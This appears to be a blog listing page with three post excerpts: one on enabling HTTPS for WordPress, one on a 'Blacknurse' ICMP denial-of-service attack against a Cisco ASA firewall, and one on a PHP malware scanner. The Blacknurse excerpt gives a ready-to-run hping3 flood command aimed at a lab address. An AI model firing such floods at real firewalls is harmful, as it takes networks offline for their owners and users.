Enable HTTPS on wordpress + Fix the Mix Content HTTPS alert
Google Chrome is going to show the Non-Secure alert for all Non-HTTPS sites, after hitting a few bad reference, we have finalize the following works fine: Use Let’sEncrypt to generate yourself a valid SSL, or just use CloudFlare’s FlexiSSL Make...
Blacknurse DoS attack on Cisco ASA
Cisco ASA config: Outside: 192.168.9.136/24 Inside: 192.168.1.1/24 How to attack it: 1. Get a ubuntu or any Linux server, install hping3 (apt-get install hping3) 2. attack it: hping3 -1 -C 3 -K 3 -i u20 192.168.9.136 Monitoring from Cisco ASA...
Free malicious script scanner – AI-Bolit
It’s been a common issue for PHP sites especially unpatched CMS like WordPress / Magento becoming a victim of web defacement, where hackers have uploaded malicious codes into the application, hidden in the PHP / CSS / JS / HTML...